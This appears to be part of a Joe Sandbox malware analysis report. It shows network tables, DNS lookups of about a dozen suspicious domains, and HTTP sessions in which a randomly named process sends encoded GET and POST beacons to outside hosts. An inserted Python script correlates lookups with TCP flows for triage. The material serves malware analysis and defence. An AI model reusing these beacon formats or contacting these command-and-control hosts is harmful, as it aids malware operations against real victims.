Sep 16, 2024 09:40:56.025010109 CEST | 80          | 49744     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:56.025144100 CEST | 80          | 49744     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:56.025252104 CEST | 80          | 49744     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:56.025270939 CEST | 49744       | 80        | 192.168.2.5     | 154.23.176.197
Sep 16, 2024 09:40:56.025288105 CEST | 80          | 49744     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:56.025374889 CEST | 80          | 49744     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:56.026779890 CEST | 49744       | 80        | 192.168.2.5     | 154.23.176.197
Sep 16, 2024 09:40:56.032697916 CEST | 49744       | 80        | 192.168.2.5     | 154.23.176.197
Sep 16, 2024 09:40:56.037518024 CEST | 80          | 49744     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:41:01.470941067 CEST | 49745       | 80        | 192.168.2.5     | 62.149.128.40
Sep 16, 2024 09:41:01.476011038 CEST | 80          | 49745     | 62.149.128.40   | 192.168.2.5
Sep 16, 2024 09:41:01.476099014 CEST | 49745       | 80        | 192.168.2.5     | 62.149.128.40
Sep 16, 2024 09:41:01.486906052 CEST | 49745       | 80        | 192.168.2.5     | 62.149.128.40
Sep 16, 2024 09:41:01.491998911 CEST | 80          | 49745     | 62.149.128.40   | 192.168.2.5
Sep 16, 2024 09:41:02.161469936 CEST | 80          | 49745     | 62.149.128.40   | 192.168.2.5
Sep 16, 2024 09:41:02.161495924 CEST | 80          | 49745     | 62.149.128.40   | 192.168.2.5
Sep 16, 2024 09:41:02.161513090 CEST | 80          | 49745     | 62.149.128.40   | 192.168.2.5
Sep 16, 2024 09:41:02.161528111 CEST | 80          | 49745     | 62.149.128.40   | 192.168.2.5
Sep 16, 2024 09:41:02.161544085 CEST | 80          | 49745     | 62.149.128.40   | 192.168.2.5
Sep 16, 2024 09:41:02.161561012 CEST | 80          | 49745     | 62.149.128.40   | 192.168.2.5
Sep 16, 2024 09:41:02.161581993 CEST | 49745       | 80        | 192.168.2.5     | 62.149.128.40
Sep 16, 2024 09:41:02.162925005 CEST | 49745       | 80        | 192.168.2.5     | 62.149.128.40
Sep 16, 2024 09:41:02.994915962 CEST | 49745       | 80        | 192.168.2.5     | 62.149.128.40
Sep 16, 2024 09:41:04.016732931 CEST | 49746       | 80        | 192.168.2.5     | 62.149.128.40
Sep 16, 2024 09:41:04.021915913 CEST | 80          | 49746     | 62.149.128.40   | 192.168.2.5
Sep 16, 2024 09:41:04.024871111 CEST | 49746       | 80        | 192.168.2.5     | 62.149.128.40
Sep 16, 2024 09:41:04.036267042 CEST | 49746       | 80        | 192.168.2.5     | 62.149.128.40
Sep 16, 2024 09:41:04.041205883 CEST | 80          | 49746     | 62.149.128.40   | 192.168.2.5
Sep 16, 2024 09:41:04.709839106 CEST | 80          | 49746     | 62.149.128.40   | 192.168.2.5
Sep 16, 2024 09:41:04.709862947 CEST | 80          | 49746     | 62.149.128.40   | 192.168.2.5
Sep 16, 2024 09:41:04.709878922 CEST | 80          | 49746     | 62.149.128.40   | 192.168.2.5
Sep 16, 2024 09:41:04.709893942 CEST | 80          | 49746     | 62.149.128.40   | 192.168.2.5
Sep 16, 2024 09:41:04.709908962 CEST | 80          | 49746     | 62.149.128.40   | 192.168.2.5
Sep 16, 2024 09:41:04.709924936 CEST | 80          | 49746     | 62.149.128.40   | 192.168.2.5
Sep 16, 2024 09:41:04.709925890 CEST | 49746       | 80        | 192.168.2.5     | 62.149.128.40
Sep 16, 2024 09:41:04.709980011 CEST | 49746       | 80        | 192.168.2.5     | 62.149.128.40
Sep 16, 2024 09:41:05.541830063 CEST | 49746       | 80        | 192.168.2.5     | 62.149.128.40
Sep 16, 2024 09:41:06.559864044 CEST | 49747       | 80        | 192.168.2.5     | 62.149.128.40
Sep 16, 2024 09:41:06.564754009 CEST | 80          | 49747     | 62.149.128.40   | 192.168.2.5
Sep 16, 2024 09:41:06.567806959 CEST | 49747       | 80        | 192.168.2.5     | 62.149.128.40
Sep 16, 2024 09:41:06.579729080 CEST | 49747       | 80        | 192.168.2.5     | 62.149.128.40
Sep 16, 2024 09:41:06.584556103 CEST | 80          | 49747     | 62.149.128.40   | 192.168.2.5
Sep 16, 2024 09:41:06.584611893 CEST | 80          | 49747     | 62.149.128.40   | 192.168.2.5
Sep 16, 2024 09:41:07.235972881 CEST | 80          | 49747     | 62.149.128.40   | 192.168.2.5
Sep 16, 2024 09:41:07.235990047 CEST | 80          | 49747     | 62.149.128.40   | 192.168.2.5
Sep 16, 2024 09:41:07.236000061 CEST | 80          | 49747     | 62.149.128.40   | 192.168.2.5
Sep 16, 2024 09:41:07.236010075 CEST | 80          | 49747     | 62.149.128.40   | 192.168.2.5
Sep 16, 2024 09:41:07.236021042 CEST | 80          | 49747     | 62.149.128.40   | 192.168.2.5
Sep 16, 2024 09:41:07.236042023 CEST | 80          | 49747     | 62.149.128.40   | 192.168.2.5
Sep 16, 2024 09:41:07.236053944 CEST | 49747       | 80        | 192.168.2.5     | 62.149.128.40
Sep 16, 2024 09:41:07.236109018 CEST | 49747       | 80        | 192.168.2.5     | 62.149.128.40
Sep 16, 2024 09:41:08.098728895 CEST | 49747       | 80        | 192.168.2.5     | 62.149.128.40
Sep 16, 2024 09:41:09.110044003 CEST | 49748       | 80        | 192.168.2.5     | 62.149.128.40
Sep 16, 2024 09:41:09.201560020 CEST | 80          | 49748     | 62.149.128.40   | 192.168.2.5
Sep 16, 2024 09:41:09.201631069 CEST | 49748       | 80        | 192.168.2.5     | 62.149.128.40
Sep 16, 2024 09:41:09.210674047 CEST | 49748       | 80        | 192.168.2.5     | 62.149.128.40
Sep 16, 2024 09:41:09.215864897 CEST | 80          | 49748     | 62.149.128.40   | 192.168.2.5
Sep 16, 2024 09:41:09.875648975 CEST | 80          | 49748     | 62.149.128.40   | 192.168.2.5
Sep 16, 2024 09:41:09.875668049 CEST | 80          | 49748     | 62.149.128.40   | 192.168.2.5
Sep 16, 2024 09:41:09.875679970 CEST | 80          | 49748     | 62.149.128.40   | 192.168.2.5
Sep 16, 2024 09:41:09.875689030 CEST | 80          | 49748     | 62.149.128.40   | 192.168.2.5
Sep 16, 2024 09:41:09.875705957 CEST | 80          | 49748     | 62.149.128.40   | 192.168.2.5
Sep 16, 2024 09:41:09.875715971 CEST | 80          | 49748     | 62.149.128.40   | 192.168.2.5
Sep 16, 2024 09:41:09.876719952 CEST | 49748       | 80        | 192.168.2.5     | 62.149.128.40
Sep 16, 2024 09:41:09.880225897 CEST | 49748       | 80        | 192.168.2.5     | 62.149.128.40
Sep 16, 2024 09:41:09.885060072 CEST | 80          | 49748     | 62.149.128.40   | 192.168.2.5
Timestamp                            | Source Port | Dest Port | Source IP       | Dest IP
Sep 16, 2024 09:38:01.255412102 CEST | 51352       | 53        | 192.168.2.5     | 1.1.1.1
Sep 16, 2024 09:38:01.265049934 CEST | 53          | 51352     | 1.1.1.1         | 192.168.2.5
Sep 16, 2024 09:38:06.280266047 CEST | 49276       | 53        | 192.168.2.5     | 1.1.1.1
Sep 16, 2024 09:38:06.314523935 CEST | 53          | 49276     | 1.1.1.1         | 192.168.2.5
Sep 16, 2024 09:38:23.467473984 CEST | 51664       | 53        | 192.168.2.5     | 1.1.1.1
Sep 16, 2024 09:38:23.905695915 CEST | 53          | 51664     | 1.1.1.1         | 192.168.2.5
Sep 16, 2024 09:38:37.482906103 CEST | 60249       | 53        | 192.168.2.5     | 1.1.1.1
Sep 16, 2024 09:38:37.736737967 CEST | 53          | 60249     | 1.1.1.1         | 192.168.2.5
Sep 16, 2024 09:39:11.764502048 CEST | 59343       | 53        | 192.168.2.5     | 1.1.1.1
Sep 16, 2024 09:39:12.192517996 CEST | 53          | 59343     | 1.1.1.1         | 192.168.2.5
Sep 16, 2024 09:39:25.764261007 CEST | 62771       | 53        | 192.168.2.5     | 1.1.1.1
Sep 16, 2024 09:39:25.776603937 CEST | 53          | 62771     | 1.1.1.1         | 192.168.2.5
Sep 16, 2024 09:39:41.938661098 CEST | 54145       | 53        | 192.168.2.5     | 1.1.1.1
Sep 16, 2024 09:39:41.953152895 CEST | 53          | 54145     | 1.1.1.1         | 192.168.2.5
Sep 16, 2024 09:39:50.062906981 CEST | 52205       | 53        | 192.168.2.5     | 1.1.1.1
Sep 16, 2024 09:39:50.182137012 CEST | 53          | 52205     | 1.1.1.1         | 192.168.2.5
Sep 16, 2024 09:40:03.310873985 CEST | 49218       | 53        | 192.168.2.5     | 1.1.1.1
Sep 16, 2024 09:40:03.473642111 CEST | 53          | 49218     | 1.1.1.1         | 192.168.2.5
Sep 16, 2024 09:40:16.812474966 CEST | 51932       | 53        | 192.168.2.5     | 1.1.1.1
Sep 16, 2024 09:40:16.821861982 CEST | 53          | 51932     | 1.1.1.1         | 192.168.2.5
Sep 16, 2024 09:40:24.889445066 CEST | 52764       | 53        | 192.168.2.5     | 1.1.1.1
Sep 16, 2024 09:40:24.945646048 CEST | 53          | 52764     | 1.1.1.1         | 192.168.2.5
Sep 16, 2024 09:40:38.123594999 CEST | 62021       | 53        | 192.168.2.5     | 1.1.1.1
Sep 16, 2024 09:40:39.100420952 CEST | 53          | 62021     | 1.1.1.1         | 192.168.2.5
Sep 16, 2024 09:40:47.156325102 CEST | 57785       | 53        | 192.168.2.5     | 1.1.1.1
Sep 16, 2024 09:40:47.189871073 CEST | 53          | 57785     | 1.1.1.1         | 192.168.2.5
Sep 16, 2024 09:41:01.046601057 CEST | 62014       | 53        | 192.168.2.5     | 1.1.1.1
Sep 16, 2024 09:41:01.468385935 CEST | 53          | 62014     | 1.1.1.1         | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 16, 2024 09:38:01.255412102 CEST | 192.168.2.5 | 1.1.1.1 | 0xd23c | Standard query (0) | www.linkbasic.net | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:38:06.280266047 CEST | 192.168.2.5 | 1.1.1.1 | 0x3a9c | Standard query (0) | www.chamadaslotgiris.net | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:38:23.467473984 CEST | 192.168.2.5 | 1.1.1.1 | 0xec39 | Standard query (0) | www.masteriocp.online | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:38:37.482906103 CEST | 192.168.2.5 | 1.1.1.1 | 0xab11 | Standard query (0) | www.mediaplug.biz | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:39:11.764502048 CEST | 192.168.2.5 | 1.1.1.1 | 0x5d1f | Standard query (0) | www.independent200.org | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:39:25.764261007 CEST | 192.168.2.5 | 1.1.1.1 | 0x3043 | Standard query (0) | www.tigre777gg.online | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:39:41.938661098 CEST | 192.168.2.5 | 1.1.1.1 | 0xeb40 | Standard query (0) | www.monos.shop | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:39:50.062906981 CEST | 192.168.2.5 | 1.1.1.1 | 0x9b1b | Standard query (0) | www.personal-loans-jp8.xyz | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:40:03.310873985 CEST | 192.168.2.5 | 1.1.1.1 | 0x974d | Standard query (0) | www.quantumnests.xyz | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:40:16.812474966 CEST | 192.168.2.5 | 1.1.1.1 | 0x3a53 | Standard query (0) | www.abbabyfernando.online | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:40:24.889445066 CEST | 192.168.2.5 | 1.1.1.1 | 0xf282 | Standard query (0) | www.parcelfly.net | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:40:38.123594999 CEST | 192.168.2.5 | 1.1.1.1 | 0x8945 | Standard query (0) | www.siyue.xyz | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:40:47.156325102 CEST | 192.168.2.5 | 1.1.1.1 | 0x6f35 | Standard query (0) | www.shipincheshi.skin | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:41:01.046601057 CEST | 192.168.2.5 | 1.1.1.1 | 0xc84c | Standard query (0) | www.fimgroup.net | A (IP address) | IN (0x0001) | false
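Read together with the TCP table above, the query list shows which of the probed names actually led to a connection. The Python below is an added example, not part of the Joe Sandbox report or of Joe Sandbox's own tooling: it parses a handful of rows transcribed from this report's DNS query and TCP tables into a pipe-separated form and attributes to each query the first new outbound TCP flow that opens before the next query. That pairing rule is an assumption made here for triage; the report's DNS answer table remains the authoritative name-to-address mapping.

```python
"""Attribute each DNS lookup in the report to the TCP flow that followed it.

Added example, not code from Joe Sandbox or from this report. The rows below
are transcribed from the report's DNS query and TCP tables (a subset, in a
pipe-separated form). The pairing rule is an assumption made here: a query
is attributed the first new outbound TCP flow (first packet the sandbox host
sends from a not-yet-seen source port) that starts after the query and
before the next query. The report's DNS answer table is the authoritative
name-to-address mapping; this is only a timing heuristic for triage.
"""
from datetime import datetime

SANDBOX_HOST = "192.168.2.5"  # the analysis VM's address in this report

# Transcribed from the report's DNS query table (subset).
DNS_QUERY_ROWS = """\
Sep 16, 2024 09:40:03.310873985 CEST | 192.168.2.5 | 1.1.1.1 | 0x974d | Standard query (0) | www.quantumnests.xyz | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:40:16.812474966 CEST | 192.168.2.5 | 1.1.1.1 | 0x3a53 | Standard query (0) | www.abbabyfernando.online | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:40:24.889445066 CEST | 192.168.2.5 | 1.1.1.1 | 0xf282 | Standard query (0) | www.parcelfly.net | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:40:38.123594999 CEST | 192.168.2.5 | 1.1.1.1 | 0x8945 | Standard query (0) | www.siyue.xyz | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:40:47.156325102 CEST | 192.168.2.5 | 1.1.1.1 | 0x6f35 | Standard query (0) | www.shipincheshi.skin | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:41:01.046601057 CEST | 192.168.2.5 | 1.1.1.1 | 0xc84c | Standard query (0) | www.fimgroup.net | A (IP address) | IN (0x0001) | false
"""

# Transcribed from the report's TCP packet table (subset; one inbound row is
# kept on purpose to show that server replies never open a flow).
TCP_ROWS = """\
Sep 16, 2024 09:40:10.209602118 CEST | 49735 | 80 | 192.168.2.5 | 162.0.239.141
Sep 16, 2024 09:40:10.216156006 CEST | 80 | 49734 | 162.0.239.141 | 192.168.2.5
Sep 16, 2024 09:40:11.123816013 CEST | 49736 | 80 | 192.168.2.5 | 162.0.239.141
Sep 16, 2024 09:40:24.949824095 CEST | 49737 | 80 | 192.168.2.5 | 84.32.84.32
Sep 16, 2024 09:40:24.959258080 CEST | 80 | 49737 | 84.32.84.32 | 192.168.2.5
Sep 16, 2024 09:40:27.498574972 CEST | 49738 | 80 | 192.168.2.5 | 84.32.84.32
Sep 16, 2024 09:40:47.193717003 CEST | 49741 | 80 | 192.168.2.5 | 154.23.176.197
Sep 16, 2024 09:40:49.748785019 CEST | 49742 | 80 | 192.168.2.5 | 154.23.176.197
Sep 16, 2024 09:41:01.470941067 CEST | 49745 | 80 | 192.168.2.5 | 62.149.128.40
Sep 16, 2024 09:41:04.016732931 CEST | 49746 | 80 | 192.168.2.5 | 62.149.128.40
"""


def parse_ts(text):
    """'Sep 16, 2024 09:40:03.310873985 CEST' -> datetime.

    The report logs nanoseconds but datetime carries microseconds, so the
    last three digits are dropped. The zone suffix is ignored: every row in
    this report is CEST, so ordering is unaffected.
    """
    date, clock, _zone = text.strip().rsplit(" ", 2)
    return datetime.strptime(f"{date} {clock[:-3]}", "%b %d, %Y %H:%M:%S.%f")


def parse_dns_queries(text):
    """Return [(timestamp, queried name)] from pipe-separated query rows, oldest first."""
    queries = []
    for line in text.splitlines():
        cols = [c.strip() for c in line.split("|")]
        queries.append((parse_ts(cols[0]), cols[5]))  # column 5 is Name
    return sorted(queries)


def parse_tcp(text):
    """Return [(timestamp, sport, dport, src, dst)] from pipe-separated TCP rows."""
    packets = []
    for line in text.splitlines():
        ts, sport, dport, src, dst = [c.strip() for c in line.split("|")]
        packets.append((parse_ts(ts), int(sport), int(dport), src, dst))
    return sorted(packets)


def first_packets(packets, host):
    """Return (timestamp, dst, dport) for the first packet of each outbound flow.

    A flow is keyed by the host's source port; packets sent *to* the host
    (server replies) are skipped, so they never count as a new connection.
    """
    seen = set()
    flows = []
    for ts, sport, dport, src, dst in packets:
        if src == host and sport not in seen:
            seen.add(sport)
            flows.append((ts, dst, dport))
    return flows


def correlate(queries, flows):
    """Map each queried name to (dst, dport) of the first flow opened in its window.

    Window = [query time, next query time); None when no flow opened in it.
    This is the timing heuristic described in the module docstring.
    """
    attributed = {}
    for i, (q_ts, name) in enumerate(queries):
        window_end = queries[i + 1][0] if i + 1 < len(queries) else None
        attributed[name] = None
        for f_ts, dst, dport in flows:
            if f_ts >= q_ts and (window_end is None or f_ts < window_end):
                attributed[name] = (dst, dport)
                break
    return attributed


def sessions_per_destination(flows):
    """Count distinct outbound flows per destination address."""
    counts = {}
    for _ts, dst, _dport in flows:
        counts[dst] = counts.get(dst, 0) + 1
    return counts


if __name__ == "__main__":
    queries = parse_dns_queries(DNS_QUERY_ROWS)
    flows = first_packets(parse_tcp(TCP_ROWS), SANDBOX_HOST)
    for name, target in correlate(queries, flows).items():
        print(f"{name:<28} -> {target}")
    print("flows per destination:", sessions_per_destination(flows))
```

Run as a script it prints one line per queried name. In this excerpt www.abbabyfernando.online and www.siyue.xyz get None because no new flow opens between their query and the next one, which is the pattern you see when a sample rotates through a list of candidate domains and only some of them are ever contacted; the per-destination count shows the repeated short HTTP sessions (one new source port each) to the hosts that were.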
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 16, 2024 09:38:01.265049934 CEST | 1.1.1.1 | 192.168.2.5 | 0xd23c | Name error (3) | www.linkbasic.net | none | none | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:38:06.314523935 CEST | 1.1.1.1 | 192.168.2.5 | 0x3a9c | No error (0) | www.chamadaslotgiris.net | chamadaslotgiris.net | | CNAME (Canonical name) | IN (0x0001) | false
Sep 16, 2024 09:38:06.314523935 CEST | 1.1.1.1 | 192.168.2.5 | 0x3a9c | No error (0) | chamadaslotgiris.net | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:38:06.314523935 CEST | 1.1.1.1 | 192.168.2.5 | 0x3a9c | No error (0) | chamadaslotgiris.net | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:38:23.905695915 CEST | 1.1.1.1 | 192.168.2.5 | 0xec39 | No error (0) | www.masteriocp.online | dns.ladipage.com | | CNAME (Canonical name) | IN (0x0001) | false
Sep 16, 2024 09:38:23.905695915 CEST | 1.1.1.1 | 192.168.2.5 | 0xec39 | No error (0) | dns.ladipage.com | | 13.228.81.39 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:38:23.905695915 CEST | 1.1.1.1 | 192.168.2.5 | 0xec39 | No error (0) | dns.ladipage.com | | 18.139.62.226 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:38:23.905695915 CEST | 1.1.1.1 | 192.168.2.5 | 0xec39 | No error (0) | dns.ladipage.com | | 54.179.173.60 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:38:37.736737967 CEST | 1.1.1.1 | 192.168.2.5 | 0xab11 | No error (0) | www.mediaplug.biz | | 66.81.203.200 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:38:37.736737967 CEST | 1.1.1.1 | 192.168.2.5 | 0xab11 | No error (0) | www.mediaplug.biz | | 66.81.203.10 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:38:37.736737967 CEST | 1.1.1.1 | 192.168.2.5 | 0xab11 | No error (0) | www.mediaplug.biz | | 66.81.203.135 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:39:12.192517996 CEST | 1.1.1.1 | 192.168.2.5 | 0x5d1f | No error (0) | www.independent200.org | | 103.42.108.46 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:39:25.776603937 CEST | 1.1.1.1 | 192.168.2.5 | 0x3043 | No error (0) | www.tigre777gg.online | tigre777gg.online | | CNAME (Canonical name) | IN (0x0001) | false
Sep 16, 2024 09:39:25.776603937 CEST | 1.1.1.1 | 192.168.2.5 | 0x3043 | No error (0) | tigre777gg.online | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:39:25.776603937 CEST | 1.1.1.1 | 192.168.2.5 | 0x3043 | No error (0) | tigre777gg.online | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:39:41.953152895 CEST | 1.1.1.1 | 192.168.2.5 | 0xeb40 | Name error (3) | www.monos.shop | none | none | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:39:50.182137012 CEST | 1.1.1.1 | 192.168.2.5 | 0x9b1b | No error (0) | www.personal-loans-jp8.xyz | | 199.59.243.226 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:40:03.473642111 CEST | 1.1.1.1 | 192.168.2.5 | 0x974d | No error (0) | www.quantumnests.xyz | | 162.0.239.141 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:40:16.821861982 CEST | 1.1.1.1 | 192.168.2.5 | 0x3a53 | Name error (3) | www.abbabyfernando.online | none | none | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:40:24.945646048 CEST | 1.1.1.1 | 192.168.2.5 | 0xf282 | No error (0) | www.parcelfly.net | parcelfly.net | | CNAME (Canonical name) | IN (0x0001) | false
Sep 16, 2024 09:40:24.945646048 CEST | 1.1.1.1 | 192.168.2.5 | 0xf282 | No error (0) | parcelfly.net | | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:40:47.189871073 CEST | 1.1.1.1 | 192.168.2.5 | 0x6f35 | No error (0) | www.shipincheshi.skin | | 154.23.176.197 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:40:47.189871073 CEST | 1.1.1.1 | 192.168.2.5 | 0x6f35 | No error (0) | www.shipincheshi.skin | | 154.23.176.232 | A (IP address) | IN (0x0001) | false
Sep 16, 2024 09:41:01.468385935 CEST | 1.1.1.1 | 192.168.2.5 | 0xc84c | No error (0) | www.fimgroup.net | fimgroup.net | | CNAME (Canonical name) | IN (0x0001) | false
Sep 16, 2024 09:41:01.468385935 CEST | 1.1.1.1 | 192.168.2.5 | 0xc84c | No error (0) | fimgroup.net | | 62.149.128.40 | A (IP address) | IN (0x0001) | false
• www.chamadaslotgiris.net
• www.masteriocp.online
• www.mediaplug.biz
• www.independent200.org
• www.tigre777gg.online
• www.personal-loans-jp8.xyz
• www.quantumnests.xyz
• www.parcelfly.net
• www.shipincheshi.skin
• www.fimgroup.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49712 | 3.33.130.190 | 80 | 2796 | C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 16, 2024 09:38:06.338335037 CEST | 532 | OUT | GET /gqyt/?prutfR_P=NZeSp/M8BkILDmxjoR6EHyrE2kg7hHPRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQykA5Xt3rjq5i1um85DwW90kuO6Jainieo24Gz0Ls55ZIPYw==&u8b=M0MH_xux6 HTTP/1.1
Host: www.chamadaslotgiris.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Sep 16, 2024 09:38:08.413790941 CEST | 410 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Mon, 16 Sep 2024 07:38:07 GMT
Content-Type: text/html
Content-Length: 270
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 70 72 75 74 66 52 5f 50 3d 4e 5a 65 53 70 2f 4d 38 42 6b 49 4c 44 6d 78 6a 6f 52 36 45 48 79 72 45 32 6b 67 37 68 48 50 52 47 69 66 7a 30 2f 74 6d 56 69 32 62 31 6f 56 4f 35 4e 65 48 65 4c 32 75 6c 7a 4f 6e 66 34 49 79 32 63 74 6a 45 76 53 38 33 34 77 30 35 67 4d 73 36 4d 51 79 6b 41 35 58 74 33 72 6a 71 35 69 31 75 6d 38 35 44 77 57 39 30 6b 75 4f 36 4a 61 69 6e 69 65 6f 32 34 47 7a 30 4c 73 35 35 5a 49 50 59 77 3d 3d 26 75 38 62 3d 4d 30 4d 48 5f 78 75 78 36 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?prutfR_P=NZeSp/M8BkILDmxjoR6EHyrE2kg7hHPRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQykA5Xt3rjq5i1um85DwW90kuO6Jainieo24Gz0Ls55ZIPYw==&u8b=M0MH_xux6"}</script></head></html>
Sep 16, 2024 09:38:08.413826942 CEST | 410 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Mon, 16 Sep 2024 07:38:07 GMT
Content-Type: text/html
Content-Length: 270
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 70 72 75 74 66 52 5f 50 3d 4e 5a 65 53 70 2f 4d 38 42 6b 49 4c 44 6d 78 6a 6f 52 36 45 48 79 72 45 32 6b 67 37 68 48 50 52 47 69 66 7a 30 2f 74 6d 56 69 32 62 31 6f 56 4f 35 4e 65 48 65 4c 32 75 6c 7a 4f 6e 66 34 49 79 32 63 74 6a 45 76 53 38 33 34 77 30 35 67 4d 73 36 4d 51 79 6b 41 35 58 74 33 72 6a 71 35 69 31 75 6d 38 35 44 77 57 39 30 6b 75 4f 36 4a 61 69 6e 69 65 6f 32 34 47 7a 30 4c 73 35 35 5a 49 50 59 77 3d 3d 26 75 38 62 3d 4d 30 4d 48 5f 78 75 78 36 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?prutfR_P=NZeSp/M8BkILDmxjoR6EHyrE2kg7hHPRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQykA5Xt3rjq5i1um85DwW90kuO6Jainieo24Gz0Ls55ZIPYw==&u8b=M0MH_xux6"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49713 | 13.228.81.39 | 80 | 2796 | C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 16, 2024 09:38:23.925378084 CEST | 797 | OUT | POST /p5rq/ HTTP/1.1
Host: www.masteriocp.online
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US
Connection: close
Content-Length: 209
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Origin: http://www.masteriocp.online
Referer: http://www.masteriocp.online/p5rq/
User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
